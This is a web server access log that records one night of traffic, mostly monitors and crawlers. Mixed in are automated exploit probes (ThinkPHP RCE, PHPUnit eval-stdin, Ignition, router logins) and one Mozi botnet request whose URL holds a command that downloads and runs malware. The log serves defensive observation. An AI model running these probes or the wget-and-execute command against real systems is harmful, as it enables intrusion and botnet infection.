45.155.205.108 - - [05/Feb/2021:23:41:34 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:34 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:41:35 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Feb/2021:23:41:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.155.205.108 - - [05/Feb/2021:23:42:05 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:05 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:06 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:27 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:27 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:27 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:27 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:27 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:27 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.108 - - [05/Feb/2021:23:42:28 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Feb/2021:23:42:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:43:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:44:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:45:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:46:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:47:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:48:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.54 - - [05/Feb/2021:23:49:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.54 - - [05/Feb/2021:23:49:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [05/Feb/2021:23:49:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:50:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:51:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:52:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:53:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:54:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:55:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:56:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:57:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:58:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Feb/2021:23:59:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.163.109.66 - - [06/Feb/2021:00:15:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.163.109.66 - - [06/Feb/2021:00:15:56 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.163.109.66 - - [06/Feb/2021:00:15:56 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.163.109.66 - - [06/Feb/2021:00:15:56 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.163.109.66 - - [06/Feb/2021:00:15:56 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
35.187.190.226 - - [06/Feb/2021:00:16:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
172.104.242.173 - - [06/Feb/2021:00:33:25 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:33:28 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:34:23 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
177.92.12.214 - - [06/Feb/2021:00:35:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
172.104.242.173 - - [06/Feb/2021:00:35:26 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:37:31 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:37:37 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:37:41 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:38:01 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:38:54 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.104.242.173 - - [06/Feb/2021:00:39:21 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
66.240.205.34 - - [06/Feb/2021:00:59:33 +0100] "Gh0st\xad" 501 321 "-" "-"
41.222.207.209 - - [06/Feb/2021:01:06:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
74.120.14.54 - - [06/Feb/2021:01:16:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.120.14.54 - - [06/Feb/2021:01:16:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
172.105.89.161 - - [06/Feb/2021:01:16:33 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:16:53 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:16:55 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:17:56 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:20:29 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:21:08 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:21:17 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:22:59 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:23:26 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [06/Feb/2021:01:23:41 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
95.237.0.15 - - [06/Feb/2021:01:24:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.224.129.247 - - [06/Feb/2021:01:46:00 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
193.118.53.202 - - [06/Feb/2021:01:48:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
199.19.225.150 - - [06/Feb/2021:01:51:35 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
162.142.125.56 - - [06/Feb/2021:01:53:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.56 - - [06/Feb/2021:01:53:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.224.129.247 - - [06/Feb/2021:01:56:28 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
199.19.225.150 - - [06/Feb/2021:02:11:48 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
109.99.218.162 - - [06/Feb/2021:02:13:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
191.37.9.167 - - [06/Feb/2021:02:15:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
144.76.162.206 - - [06/Feb/2021:02:17:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
185.224.129.247 - - [06/Feb/2021:02:25:04 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
78.137.5.114 - - [06/Feb/2021:02:49:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
17.58.101.87 - - [06/Feb/2021:02:51:16 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.58.103.231 - - [06/Feb/2021:02:51:16 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.224.129.247 - - [06/Feb/2021:03:14:03 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
162.62.16.194 - - [06/Feb/2021:03:14:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
162.62.16.194 - - [06/Feb/2021:03:14:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
162.62.16.194 - - [06/Feb/2021:03:14:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.224.129.247 - - [06/Feb/2021:03:17:43 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
89.191.99.34 - - [06/Feb/2021:03:26:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
201.54.100.93 - - [06/Feb/2021:03:32:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
144.76.102.243 - - [06/Feb/2021:03:39:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36"
170.244.188.25 - - [06/Feb/2021:03:46:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
154.54.249.17 - - [06/Feb/2021:03:49:43 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.17 - - [06/Feb/2021:03:49:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
115.63.53.138 - - [06/Feb/2021:03:59:52 +0100] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
185.224.129.247 - - [06/Feb/2021:04:02:45 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
177.195.159.70 - - [06/Feb/2021:04:07:50 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
177.195.159.70 - - [06/Feb/2021:04:07:50 +0100] "GET /jenkins/login HTTP/1.0" 404 314 "-" "-"
177.195.159.70 - - [06/Feb/2021:04:07:51 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
177.195.159.70 - - [06/Feb/2021:04:07:51 +0100] "GET /wp-login.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
27.38.254.235 - - [06/Feb/2021:04:19:18 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
188.233.95.246 - - [06/Feb/2021:04:40:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.224.129.247 - - [06/Feb/2021:04:40:44 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
109.176.179.202 - - [06/Feb/2021:04:53:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.115.54.48 - - [06/Feb/2021:05:01:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
92.118.161.37 - - [06/Feb/2021:05:05:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
157.55.39.1 - - [06/Feb/2021:05:07:55 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.39 - - [06/Feb/2021:05:08:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
92.118.161.9 - - [06/Feb/2021:05:09:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
167.248.133.55 - - [06/Feb/2021:05:20:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.55 - - [06/Feb/2021:05:20:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.224.129.247 - - [06/Feb/2021:05:22:04 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
162.142.125.38 - - [06/Feb/2021:05:34:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.38 - - [06/Feb/2021:05:34:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.224.129.247 - - [06/Feb/2021:05:41:57 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
51.178.47.149 - - [06/Feb/2021:05:46:49 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
51.178.47.149 - - [06/Feb/2021:05:46:49 +0100] "GET /jenkins/login HTTP/1.0" 404 314 "-" "-"
51.178.47.149 - - [06/Feb/2021:05:46:49 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
51.178.47.149 - - [06/Feb/2021:05:46:49 +0100] "GET /wp-login.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
167.248.133.54 - - [06/Feb/2021:05:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.54 - - [06/Feb/2021:05:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
128.14.134.170 - - [06/Feb/2021:06:05:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
74.120.14.37 - - [06/Feb/2021:06:09:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.120.14.37 - - [06/Feb/2021:06:09:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
39.71.125.119 - - [06/Feb/2021:06:10:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.142.125.37 - - [06/Feb/2021:06:13:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.37 - - [06/Feb/2021:06:13:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
2.10.61.125 - - [06/Feb/2021:06:19:33 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
213.136.83.118 - - [06/Feb/2021:06:21:44 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
213.136.83.118 - - [06/Feb/2021:06:21:44 +0100] "GET /jenkins/login HTTP/1.0" 404 314 "-" "-"
213.136.83.118 - - [06/Feb/2021:06:21:44 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
88.99.27.172 - - [06/Feb/2021:06:29:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
123.7.207.90 - - [06/Feb/2021:06:32:26 +0100] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 324 "-" "-"
175.138.245.62 - - [06/Feb/2021:06:37:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
222.187.223.94 - - [06/Feb/2021:06:41:36 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
222.187.223.94 - - [06/Feb/2021:06:41:40 +0100] "GET /jenkins/login HTTP/1.0" 404 314 "-" "-"
222.187.223.94 - - [06/Feb/2021:06:41:40 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
139.162.106.181 - - [06/Feb/2021:06:41:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
52.255.179.176 - - [06/Feb/2021:06:43:57 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.255.179.176 - - [06/Feb/2021:06:43:58 +0100] "GET /wp-content/ HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.255.179.176 - - [06/Feb/2021:06:43:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
52.255.179.176 - - [06/Feb/2021:06:43:59 +0100] "GET /wp-content/ HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.141.152.171 - - [06/Feb/2021:06:44:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
176.114.228.36 - - [06/Feb/2021:06:44:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
